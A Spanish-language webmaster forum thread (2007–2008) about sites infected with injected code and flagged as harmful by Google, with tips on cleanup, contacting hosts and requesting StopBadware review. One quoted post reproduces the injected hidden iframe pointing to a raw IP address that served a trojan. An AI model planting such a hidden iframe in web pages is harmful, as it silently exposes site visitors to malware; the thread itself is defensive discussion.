| Ver tema anterior :: Ver tema siguiente |
| Autor |
Mensaje |
Bader
Me gusta Terra como Buscador
Registrado: 23 Feb 2006
Mensajes: 20
Ubicación: Colombia
|
 Publicado: Vie May 04, 2007 8:45 am Asunto: |
 |
|
Sarpanet, manten tu web en revisión. Tuve una experiencia similar con Hostgator. En principio aparecía ese iframe cada tanto y se iba. Comenzó afectando a pocos sitios del servidor y esporadicamente. Pero al parecer eran pruebas antes de atacar masivamente a todos los sitios del servidor(o al menos todos los que vi).
El primer paso es evitar que tus visitantes desprotegidos se infecten. Lo que a mi me funcionó fue lo siguiente:
Ese iframe se "insertaba" automaticamente debajo de la etiqueta body cuando el servidor "servia" al html,(el archivo en si mismo no era modificado por el troyano). Y luego de probar un monton de cosas lo solucioné de una forma bastante tonta pero que resulto muy efectiva, ya que el troyano buscaba la primer etiqueta body, insertaba el iframe y se iba, le puse un body "sebo" encerrado en un comentario, y debajo el "verdadero" body. Entonces cuando el iframe era insertado al vuelo al servirse el HTML, quedaba encerrado en un comentario y por consiguiente inefectivo. Seguramente no sirva para todos los troyanos de este estilo, pero a mi me sirvio y que lo postee aquí (Luego de largo tiempo sin posts) tal vez le sirva a alguien mas.
| Código: | <!-- <body> -->
<body> |
Saludos. |
|
| Volver arriba |
|
 |
djemili
Vivo en Xeoweb
Registrado: 01 Jun 2004
Mensajes: 2388
|
| Publicado: Vie May 04, 2007 9:38 am Asunto: |
|
|
Buen engaño Bader. Así que en tu caso estaba comprometido el servidor web entero. Que fuerte! espero que aparte del "arreglo" avisaras a los administradores del sistema de lo que estaba pasando.
Saludos
_________________
foros impresoras 3D - prusa mendel. |
|
| Volver arriba |
|
|
sarpanet
Inktomi: el mejor motor de búsqueda
Registrado: 30 Abr 2005
Mensajes: 142
|
| Publicado: Vie May 04, 2007 10:36 am Asunto: |
|
|
sí, rellené el formulario el domingo por la mañana...
muy buena Bader... lo voy a colocar ahora mismo... jejeje!!! Gracias!!!
_________________
Alojamiento web
Camaras de seguridad |
|
| Volver arriba |
|
|
Bader
Me gusta Terra como Buscador
Registrado: 23 Feb 2006
Mensajes: 20
Ubicación: Colombia
|
| Publicado: Vie May 04, 2007 2:18 pm Asunto: |
|
|
| Cita: | | espero que aparte del "arreglo" avisaras a los administradores del sistema de lo que estaba pasando. |
Si, lógicamente fué lo primero que hice, pero no es fácil que reconozcan desde el prinicipio que se les infectó un servidor. Luego el problema fue tan masivo y evidente que no les quedó alternativa más que enviar emails a todos los afectados reconociendo la infeccion, pidiendo disculpas y "alabando" a los hackers diciendo que eran muy buenos como para hacerle algo así a ellos que toman tantas medidas de seguridad, etc.
| Cita: | | lo voy a colocar ahora mismo... jejeje!!! Gracias!!! |
Yo no lo colococaría salvo que sea necesario, ya que una etiqueta body encerrada en un comentario no debería por qué afectar a la accesibilidad para los robots de los buscadores, pero no estoy seguro de ello., y tal vez se equivoquen y lo tomen como un error en el codigo tomando a la etiqueta como duplicada.
Saludos. |
|
| Volver arriba |
|
|
unoqueva
Me gusta MSN!
Registrado: 28 Oct 2005
Mensajes: 458
Ubicación: Málaga
|
| Publicado: Vie May 04, 2007 2:30 pm Asunto: |
|
|
| Bader escribió: |
... y "alabando" a los hackers diciendo que eran muy buenos como para hacerle algo así a ellos que toman tantas medidas de seguridad, etc.
|
Si lo hicieron por ftp como creo que se comentaba al principio no hay que ser muy bueno... todo servidor que tenga abierto el ftp es un colaero.
_________________
Hotel en Sevilla-Hotel Málaga |
|
| Volver arriba |
|
|
capitanregge
Soy de Yahoo!
Registrado: 25 Ene 2006
Mensajes: 674
Ubicación: Cordoba
|
| Publicado: Vie May 04, 2007 6:06 pm Asunto: |
|
|
Si te sirve saberlo, yo entro desde argentina en google busco sarpanet y no me sale ningun mensaje extraño, te lo han quitado al menos del detacenter que de acá consultamos
_________________
Buscador Argentino
Alta en Directorio Web en Español |
|
| Volver arriba |
|
|
Xyborg
Lo mío es Gigablast
Registrado: 29 Nov 2005
Mensajes: 109
|
| Publicado: Vie May 04, 2007 11:49 pm Asunto: |
|
|
Asi es, amigo estas salvado jeje, ya han hecho la nueva revision parece.
_________________
Viajes y Turismo
Campo |
|
| Volver arriba |
|
|
sarpanet
Inktomi: el mejor motor de búsqueda
Registrado: 30 Abr 2005
Mensajes: 142
|
| Publicado: Dom May 06, 2007 7:33 pm Asunto: |
|
|
Hola chicos!!! en efecto ya me han quitado!!! ufff... qué alivio!!! hasta hoy domingo a mi me aparecía la frasecita... menos mal... muchísimas gracias por vuestra ayuda. Como siempre, este foro es muy útil y con gente legal.
Un saludo a todos.
Pablo.
_________________
Alojamiento web
Camaras de seguridad |
|
| Volver arriba |
|
|
Xyborg
Lo mío es Gigablast
Registrado: 29 Nov 2005
Mensajes: 109
|
| Publicado: Mar May 15, 2007 4:24 am Asunto: |
|
|
Hola, aqui les dejo un articulo que escribi para una cruzada anti fraude organizada por el portal de seguridad Segu-Info, gran parte del articulo esta basado en tu caso, que tambien es el de muchos webmasters, espero que les sirva de algo  .
Webmasters: Las otras víctimas del Fraude en línea
http://www.segu-info.com.ar/cruzada/consejo-15.html
Un saludo.
_________________
Viajes y Turismo
Campo |
|
| Volver arriba |
|
|
sarpanet
Inktomi: el mejor motor de búsqueda
Registrado: 30 Abr 2005
Mensajes: 142
|
|
| Volver arriba |
|
|
unoqueva
Me gusta MSN!
Registrado: 28 Oct 2005
Mensajes: 458
Ubicación: Málaga
|
| Publicado: Lun Jun 18, 2007 5:25 pm Asunto: |
|
|
Por supuesto... pedir responsabilidades hasta donde puedas según tu contrato... ¿crees que ellos no lo harían si tú le hicieras "daño" aunque no tuvieras culpa?
Ellos que les pidan las responsabilidades a quien se las tengan que pedir (si es que no lo han hecho ya) pero tú has sufrido un deterioro en la imagen de tu empresa... y aquí ha quedado reflejado si es que necesistas probar algo.
_________________
Hotel en Sevilla-Hotel Málaga |
|
| Volver arriba |
|
|
nicoflash
Me paso horas con Ask Jeeves
Registrado: 18 Jun 2007
Mensajes: 240
Ubicación: Vigo
|
| Publicado: Dom May 11, 2008 7:41 pm Asunto: |
|
|
hola a todos, se que este post es no es actual pero me han hackeado una de mis webs.
Sabeis cuanto tiempo tarda google en sacar el cartelito una vez solucionado todo y enviada la revision a www.stopbadware.org
_________________
Reservas online de Hoteles en Sanxenxo
Consultor SEO |
|
| Volver arriba |
|
|
k01
Olé sí que era un buen buscador
Registrado: 28 Mar 2008
Mensajes: 46
|
| Publicado: Lun May 12, 2008 9:54 am Asunto: |
|
|
| djemili escribió: | Te han hackeado, a ti o a tu servidor, y han añadido esto en tu index y tal vez en todas tus paginas:
| Código: |
<IFRAME SRC='http://81.95.149.227/stat3/index.php' WIDTH=10 HEIGHT=10 name='ad' style='display:none'></IFRAME>
|
Si el server es tuyo, ya sabes. Si estas pagando un hosting informales lo antes posible. En cuanto arregles lo del hackeo y el código de la página dirígete a stopbadware.org y pídeles que te borren de su lista negra.
Actualizo: Concretamente tienes que dirigirte a esta dirección una vez hayas arreglado el código: http://stopbadware.org/home/review
Es un caso interesante! no sabía lo de "Este sitio puede dañar tu equipo." ni lo de stopbadware. Muy interesante...
Por cierto, desde Firefox en Linux no hay ningún peligro al visitar tu pagina. Si entras desde Windows se te instala un troyano (no se si solo desde IE o desde cualquier navegador). |
Visite la web desde un linux ^^
_________________
Relatos gratis |
|
| Volver arriba |
|
|
Arenas
¿Qué es SEO?
Registrado: 06 Oct 2008
Mensajes: 4
|
| Publicado: Mie Oct 08, 2008 6:20 pm Asunto: Mi vida cada día más complicada... |
|
|
Chicos, yo ando con el mismo problema y me paso la vida quitando/limpiando archivos. Os prometo que no doy a basto, siempre las mismas dos lineas, incluso una se esconde a la derecha del código, pero ya me lo se y la encuentro (la primera vez flipé)
He pensado que si genero un script que siempre que aparezca el pesado nombre.js me modifique esa linea y meter una linea por medio para que no se ejecute.
Creerme que lo de limpiar en mi caso es imposible, incluso afecta a varios hosting, que por cierto apuntan a la misma bbdd, creo que no estoy preparado para afrontar esto, pero ni idea de como hacer ese javascript, pues yo de eso 0 patatero.
A ver si alguien sabe orientarme o me proporciona una buena azotea para dejarme caer y terminar definitivamente con este quebradeeeeeeeero de cabeza.
Salu2,
_________________
Torneos depadel
www.liguillas.com |
|
| Volver arriba |
|
|
djemili
Vivo en Xeoweb
Registrado: 01 Jun 2004
Mensajes: 2388
|
| Publicado: Jue Oct 09, 2008 10:00 am Asunto: |
|
|
Tienes que encontrar la fuente del problema, sino estarás siempre igual. El malware puede estar en alguno de estos sitios:
+ en tu PC:
virus, troyanos, etc.. pasate un antivirus
+ en tu parte del hosting:
1. usas un software tipo wordpress o drupal con una version antigua y cada vez entran por el mismo agujero (hay que actualizar!)
2. ya te entraron y te instalaron un pluguin que se ejecuta cada vez. Instala la version mas nueva y mira todos tus pluguins a ver si encuentras alguno raro y lo borras.
+ el hosting entero esta infectado:
a veces pasa, y en ese caso no podrias hacer mucho a parte de avisarles. Es lo menos probable.
Para saber si estás en el primer caso o en el segundo, actualiza los ficheros js "infectados" desde algun PC que no sea el tuyo y que estes razonablemente seguro de que no tiene virus. Si el código malicioso vuelve a aparecer, lo mas probable es que te encuentres en el segundo caso.
Saludos
_________________
foros impresoras 3D - prusa mendel. |
|
| Volver arriba |
|
|
|
FAQ
Buscar
Miembros
Grupos de Usuarios
Registrarse
Perfil
Entre para ver sus mensajes privados
Login
